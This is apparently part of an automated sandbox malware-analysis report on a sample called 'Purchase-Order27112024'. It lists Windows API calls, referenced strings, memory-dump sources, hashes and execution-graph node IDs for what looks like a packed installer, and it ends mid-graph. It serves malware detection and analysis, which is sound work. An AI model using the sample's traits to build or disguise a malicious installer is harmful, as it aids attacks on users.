                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                      • String ID:
                                                                                                      • API String ID: 3585118688-0
                                                                                                      • Opcode ID: 35074abae760ef12712c5987b0758c23aa86cdd0156e8bbbcf6b223dd8d47178
                                                                                                      • Instruction ID: 663650117de36b32c607de2b5c5339e49b80fcfff4c178b035665d2e4b1c7066
                                                                                                      • Opcode Fuzzy Hash: 35074abae760ef12712c5987b0758c23aa86cdd0156e8bbbcf6b223dd8d47178
                                                                                                      • Instruction Fuzzy Hash: 8811A131E00204EBCF109FA0CD449EF7AB5EB44315F20447BE505B62E0C7798A82DBA9
                                                                                                      APIs
                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,37001D66,00000000,00000000,?,37005C88,37001D66,00000000,00000000,00000000,?,37005E85,00000006,FlsSetValue), ref: 37005D13
                                                                                                      • GetLastError.KERNEL32(?,37005C88,37001D66,00000000,00000000,00000000,?,37005E85,00000006,FlsSetValue,3700E190,FlsSetValue,00000000,00000364,?,37005BC8), ref: 37005D1F
                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,37005C88,37001D66,00000000,00000000,00000000,?,37005E85,00000006,FlsSetValue,3700E190,FlsSetValue,00000000), ref: 37005D2D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 3177248105-0
                                                                                                      • Opcode ID: 0304ea26d9ba1dd4718dd72365b2530591608eecde9cf9b95e37366abfafa18d
                                                                                                      • Instruction ID: edb155ca438069ce5a294d5492a31bd5473f9d5b6421b13279cdd41667e3384d
                                                                                                      • Opcode Fuzzy Hash: 0304ea26d9ba1dd4718dd72365b2530591608eecde9cf9b95e37366abfafa18d
                                                                                                      • Instruction Fuzzy Hash: 3B01D4BA641722ABE3214AA89C4DF5677D8AF057F1B110662F939F7140DB34D802CEE0
                                                                                                      APIs
                                                                                                      • _free.LIBCMT ref: 3700655C
                                                                                                        • Part of subcall function 370062BC: IsProcessorFeaturePresent.KERNEL32(00000017,370062AB,00000000,?,?,?,?,00000016,?,?,370062B8,00000000,00000000,00000000,00000000,00000000), ref: 370062BE
                                                                                                        • Part of subcall function 370062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 370062E0
                                                                                                        • Part of subcall function 370062BC: TerminateProcess.KERNEL32(00000000), ref: 370062E7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                      • String ID: *?$.
                                                                                                      • API String ID: 2667617558-3972193922
                                                                                                      • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                      • Instruction ID: 691482129f67cf3ab91e8078f6c637b68e7094c252d4ef82f8c53544a94f6b53
                                                                                                      • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                      • Instruction Fuzzy Hash: 6E517275E00219AFEB04CFA8C980BADBBF6FF48374F2581A9D854E7344E6759A018F51
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _strlen
                                                                                                      • String ID: : $Se.
                                                                                                      • API String ID: 4218353326-4089948878
                                                                                                      • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                      • Instruction ID: abd7af1e2540c9f11069ea5ec487658c652bb6827381410aad560586c2005b36
                                                                                                      • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                      • Instruction Fuzzy Hash: F211A376900249AEEB11CFA8D840BDEFBFCEF19224F10409AE545E7252E6745B02CBA5
                                                                                                      APIs
                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 37002903
                                                                                                        • Part of subcall function 370035D2: RaiseException.KERNEL32(?,?,?,37002925,00000000,00000000,00000000,?,?,?,?,?,37002925,?,370121B8), ref: 37003632
                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 37002920
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Exception@8Throw$ExceptionRaise
                                                                                                      • String ID: Unknown exception
                                                                                                      • API String ID: 3476068407-410509341
                                                                                                      • Opcode ID: 8dce46405ecb2bb32071fe00c1fb2c39e601ed7dddf0fd6bd53b886baa2fdabb
                                                                                                      • Instruction ID: 74289957332358a72edbbf7de29b98cbe93f1f801293d27f7dafbb7ed65d5758
                                                                                                      • Opcode Fuzzy Hash: 8dce46405ecb2bb32071fe00c1fb2c39e601ed7dddf0fd6bd53b886baa2fdabb
                                                                                                      • Instruction Fuzzy Hash: B6F0A47890030C7BBB04E6F5ED449AD77ACAB05670F9041E5E924E2590EF35EA16CE92
                                                                                                      APIs
                                                                                                      • IsWindowVisible.USER32(?), ref: 00405195
                                                                                                      • CallWindowProcW.USER32(?,?,?,?), ref: 004051E6
                                                                                                        • Part of subcall function 004041E6: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004041F8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                                                      • String ID:
                                                                                                      • API String ID: 3748168415-3916222277
                                                                                                      • Opcode ID: 843aab861ffb3f3227d1c446d01b64cf4776ac7e98eef2f295c4549480fb80e8
                                                                                                      • Instruction ID: 7fff49106f067b4291516d9fc604604598bdb5380bd5c908914395e8565309e0
                                                                                                      • Opcode Fuzzy Hash: 843aab861ffb3f3227d1c446d01b64cf4776ac7e98eef2f295c4549480fb80e8
                                                                                                      • Instruction Fuzzy Hash: 26015E71900609BBDB205F51ED84B6B3A26E794364F604037FA007A2D1D77A9C919F69
                                                                                                      APIs
                                                                                                      • GetTickCount.KERNEL32 ref: 00405C01
                                                                                                      • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00000000,00403358,00436000,00436800), ref: 00405C1C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CountFileNameTempTick
                                                                                                      • String ID: nsa
                                                                                                      • API String ID: 1716503409-2209301699
                                                                                                      • Opcode ID: c429582aea5e4f3fae6c397ed87dacf02ee6c580567254a7da4e12ab8597e880
                                                                                                      • Instruction ID: 094b443934c56d738417ad06ce23117a41e39d67b54f0ae1535361756efc6c0b
                                                                                                      • Opcode Fuzzy Hash: c429582aea5e4f3fae6c397ed87dacf02ee6c580567254a7da4e12ab8597e880
                                                                                                      • Instruction Fuzzy Hash: 45F09676A04208BBDB009F59DC05E9BB7B8EB91710F10803AEA01E7151E2B0AD448B54
                                                                                                      APIs
                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256F0,Error launching installer), ref: 004056E8
                                                                                                      • CloseHandle.KERNEL32(?), ref: 004056F5
                                                                                                      Strings
                                                                                                      • Error launching installer, xrefs: 004056D6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseCreateHandleProcess
                                                                                                      • String ID: Error launching installer
                                                                                                      • API String ID: 3712363035-66219284
                                                                                                      • Opcode ID: e8775a5d6321f0dea89ce82b90cc6292b7a3bd0044cb503c25c375156348e7c2
                                                                                                      • Instruction ID: 0bf1ed3311e3e942e0a1389e84d80c76f41ccd0b69acab1f7eccde3b1b9dfef0
                                                                                                      • Opcode Fuzzy Hash: e8775a5d6321f0dea89ce82b90cc6292b7a3bd0044cb503c25c375156348e7c2
                                                                                                      • Instruction Fuzzy Hash: D7E0E674E0020AAFDB009F64DD05D6B7B7DF710304F808521A915F2250D7B5E8108A7D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ba6317b19b7b230722eb11252d44c293277e5dc1cbca2e551617393c5194c9d0
                                                                                                      • Instruction ID: dca007468fed7c27dd914b546e5ea1ac9ab056a0c62ecf1bea7b7831388965f7
                                                                                                      • Opcode Fuzzy Hash: ba6317b19b7b230722eb11252d44c293277e5dc1cbca2e551617393c5194c9d0
                                                                                                      • Instruction Fuzzy Hash: 58A14471E00229DBDF28CFA8C8447ADBBB1FF48305F15816AD856BB281C7785A96CF44
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: db87408b1e9cadcd0a4c6ae5b6f4dd47f3337075cb2a4d2d14f0ff51d5c97f6a
                                                                                                      • Instruction ID: e31ab10654d3133c4bbe562e0396aaf9f668a3464ceaf5ac7e335a669e1e1d03
                                                                                                      • Opcode Fuzzy Hash: db87408b1e9cadcd0a4c6ae5b6f4dd47f3337075cb2a4d2d14f0ff51d5c97f6a
                                                                                                      • Instruction Fuzzy Hash: 8E912371E00228CBEF28CF98C8587ADBBB1FF44305F15816AD856BB291C7785A96DF44
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 165f4b65d4ff5263617aa106d744e60dbd7c4f5d43725cc52d5e79b0d4499ef2
                                                                                                      • Instruction ID: e0c60a541a5106e25e0a2f50f35f038ee2aa27f15edb78bccdd8f3c871378321
                                                                                                      • Opcode Fuzzy Hash: 165f4b65d4ff5263617aa106d744e60dbd7c4f5d43725cc52d5e79b0d4499ef2
                                                                                                      • Instruction Fuzzy Hash: 2C814471D04228DFDF24CFA8C8487ADBBB1FB45305F25816AD456BB281C7789A96CF44
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 148eda801716ed3d9969b88488a2fa3c6a7092fa608051ce9148cc038319d1b3
                                                                                                      • Instruction ID: c1f18cc480c27d0a28c5d6dc1e8cd9b1e5e62e2ab7f78041d4dc85e199002e6a
                                                                                                      • Opcode Fuzzy Hash: 148eda801716ed3d9969b88488a2fa3c6a7092fa608051ce9148cc038319d1b3
                                                                                                      • Instruction Fuzzy Hash: 9B816731D04228DBDF24CFA8C8487ADBBB1FB44305F25816AD856BB2C1C7785A96DF84
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 4983b507bd6312ae2b30a384a7c44b2e85aa51a10719cb6f4e73ba4d3199020d
                                                                                                      • Instruction ID: 317a4f11872e46a6f39a96627fb546a7164eb21cb9e645d400dda74b69288846
                                                                                                      • Opcode Fuzzy Hash: 4983b507bd6312ae2b30a384a7c44b2e85aa51a10719cb6f4e73ba4d3199020d
                                                                                                      • Instruction Fuzzy Hash: 48713471D04228DFEF24CFA8C8447ADBBB1FB48305F15816AD856BB281C7785A96DF44
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 02494a79b55f78bffb2877069ace75a440f4ea31aa61c09e76d6a1b36594b02c
                                                                                                      • Instruction ID: 7b464a411068ed62169f7738ff9b09ef3af2f2625e32a791141ed05019b82bd1
                                                                                                      • Opcode Fuzzy Hash: 02494a79b55f78bffb2877069ace75a440f4ea31aa61c09e76d6a1b36594b02c
                                                                                                      • Instruction Fuzzy Hash: A4714571E04228DFEF28CF98C8447ADBBB1FB48301F15816AD456BB281C7785996DF44
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e250f200d648af3f0bd61970bfe314c861a6b6aa0b25ddc882d3b39d553e7667
                                                                                                      • Instruction ID: 924b227091e8338000478ad755e115b80dfeef44851b3a3b0f99ac33e872c674
                                                                                                      • Opcode Fuzzy Hash: e250f200d648af3f0bd61970bfe314c861a6b6aa0b25ddc882d3b39d553e7667
                                                                                                      • Instruction Fuzzy Hash: 07713571E04228DBEF28CF98C8447ADBBB1FF44305F15816AD856BB281C7785A96DF44
                                                                                                      APIs
                                                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B29
                                                                                                      • lstrcmpiA.KERNEL32(00405D53,00000000), ref: 00405B41
                                                                                                      • CharNextA.USER32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B52
                                                                                                      • lstrlenA.KERNEL32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B5B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                                                      • String ID:
                                                                                                      • API String ID: 190613189-0
                                                                                                      • Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                                                                      • Instruction ID: 19ad592fd5dcf9c9bc99336752ee576fec3eb52e2d0cc5b6bc7cc78b570e8094
                                                                                                      • Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                                                                      • Instruction Fuzzy Hash: 5FF06231A04958AFC7129BA5DD4099FBBB8EF06350B2540A6F801F7251D674FE019BA9

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:6.2%
                                                                                                      Dynamic/Decrypted Code Coverage:9.2%
                                                                                                      Signature Coverage:3.2%
                                                                                                      Total number of Nodes:2000
                                                                                                      Total number of Limit Nodes:74
                                                                                                      execution_graph 37631 44dea5 37632 44deb5 FreeLibrary 37631->37632 37633 44dec3 37631->37633 37632->37633 39954 4147f3 39957 414561 39954->39957 39956 414813 39958 41456d 39957->39958 39959 41457f GetPrivateProfileIntW 39957->39959 39962 4143f1 memset _itow WritePrivateProfileStringW 39958->39962 39959->39956 39961 41457a 39961->39956 39962->39961 37634 4287c1 37635 4287d2 37634->37635 37638 429ac1 37634->37638 37639 428818 37635->37639 37640 42881f 37635->37640 37649 425711 37635->37649 37636 4259da 37697 416760 11 API calls 37636->37697 37668 425ad6 37638->37668 37704 415c56 11 API calls 37638->37704 37671 42013a 37639->37671 37699 420244 97 API calls 37640->37699 37642 4260dd 37698 424251 120 API calls 37642->37698 37645 4259c2 37645->37668 37691 415c56 11 API calls 37645->37691 37649->37636 37649->37638 37649->37645 37652 429a4d 37649->37652 37655 422aeb memset memcpy memcpy 37649->37655 37659 4260a1 37649->37659 37667 425a38 37649->37667 37687 4227f0 memset memcpy 37649->37687 37688 422b84 15 API calls 37649->37688 37689 422b5d memset memcpy memcpy 37649->37689 37690 422640 13 API calls 37649->37690 37692 4241fc 11 API calls 37649->37692 37693 42413a 90 API calls 37649->37693 37653 429a66 37652->37653 37654 429a9b 37652->37654 37700 415c56 11 API calls 37653->37700 37658 429a96 37654->37658 37702 416760 11 API calls 37654->37702 37655->37649 37703 424251 120 API calls 37658->37703 37696 415c56 11 API calls 37659->37696 37661 429a7a 37701 416760 11 API calls 37661->37701 37667->37645 37694 422640 13 API calls 37667->37694 37695 4226e0 12 API calls 37667->37695 37672 42014c 37671->37672 37675 420151 37671->37675 37714 41e466 97 API calls 37672->37714 37674 420162 37674->37649 37675->37674 37676 4201b3 37675->37676 37677 420229 37675->37677 37678 4201b8 37676->37678 37679 4201dc 37676->37679 37677->37674 37680 41fd5e 86 API calls 37677->37680 37705 41fbdb 37678->37705 37679->37674 37683 4201ff 37679->37683 37711 41fc4c 37679->37711 37680->37674 37683->37674 37686 42013a 97 API calls 37683->37686 37686->37674 37687->37649 37688->37649 37689->37649 37690->37649 37691->37636 37692->37649 37693->37649 37694->37667 37695->37667 37696->37636 37697->37642 37698->37668 37699->37649 37700->37661 37701->37658 37702->37658 37703->37638 37704->37636 37706 41fbf1 37705->37706 37707 41fbf8 37705->37707 37710 41fc39 37706->37710 37729 4446ce 11 API calls 37706->37729 37719 41ee26 37707->37719 37710->37674 37715 41fd5e 37710->37715 37712 41ee6b 86 API calls 37711->37712 37713 41fc5d 37712->37713 37713->37679 37714->37675 37718 41fd65 37715->37718 37716 41fdab 37716->37674 37717 41fbdb 86 API calls 37717->37718 37718->37716 37718->37717 37720 41ee41 37719->37720 37721 41ee32 37719->37721 37730 41edad 37720->37730 37733 4446ce 11 API calls 37721->37733 37724 41ee3c 37724->37706 37727 41ee58 37727->37724 37735 41ee6b 37727->37735 37729->37710 37739 41be52 37730->37739 37733->37724 37734 41eb85 11 API calls 37734->37727 37736 41ee70 37735->37736 37737 41ee78 37735->37737 37795 41bf99 86 API calls 37736->37795 37737->37724 37740 41be6f 37739->37740 37741 41be5f 37739->37741 37746 41be8c 37740->37746 37760 418c63 37740->37760 37774 4446ce 11 API calls 37741->37774 37743 41be69 37743->37724 37743->37734 37746->37743 37747 41bf3a 37746->37747 37749 41bed1 37746->37749 37751 41bee7 37746->37751 37777 4446ce 11 API calls 37747->37777 37750 41bef0 37749->37750 37753 41bee2 37749->37753 37750->37751 37752 41bf01 37750->37752 37751->37743 37778 41a453 86 API calls 37751->37778 37754 41bf24 memset 37752->37754 37756 41bf14 37752->37756 37775 418a6d memset memcpy memset 37752->37775 37764 41ac13 37753->37764 37754->37743 37776 41a223 memset memcpy memset 37756->37776 37759 41bf20 37759->37754 37762 418c72 37760->37762 37761 418c94 37761->37746 37762->37761 37763 418d51 memset memset 37762->37763 37763->37761 37765 41ac3f memset 37764->37765 37766 41ac52 37764->37766 37771 41acd9 37765->37771 37768 41ac6a 37766->37768 37779 41dc14 19 API calls 37766->37779 37769 41aca1 37768->37769 37780 41519d 37768->37780 37769->37771 37772 41acc0 memset 37769->37772 37773 41accd memcpy 37769->37773 37771->37751 37772->37771 37773->37771 37774->37743 37775->37756 37776->37759 37777->37751 37779->37768 37783 4175ed 37780->37783 37791 417570 SetFilePointer 37783->37791 37786 41760a ReadFile 37787 417637 37786->37787 37788 417627 GetLastError 37786->37788 37789 4151b3 37787->37789 37790 41763e memset 37787->37790 37788->37789 37789->37769 37790->37789 37792 41759c GetLastError 37791->37792 37794 4175b2 37791->37794 37793 4175a8 GetLastError 37792->37793 37792->37794 37793->37794 37794->37786 37794->37789 37795->37737 39963 44def7 39964 44df07 39963->39964 39965 44df00 ??3@YAXPAX 39963->39965 39966 44df17 39964->39966 39967 44df10 ??3@YAXPAX 39964->39967 39965->39964 39968 44df27 39966->39968 39969 44df20 ??3@YAXPAX 39966->39969 39967->39966 39970 44df37 39968->39970 39971 44df30 ??3@YAXPAX 39968->39971 39969->39968 39971->39970 37796 417bc5 37797 417c61 37796->37797 37798 417bda 37796->37798 37798->37797 37799 417bf6 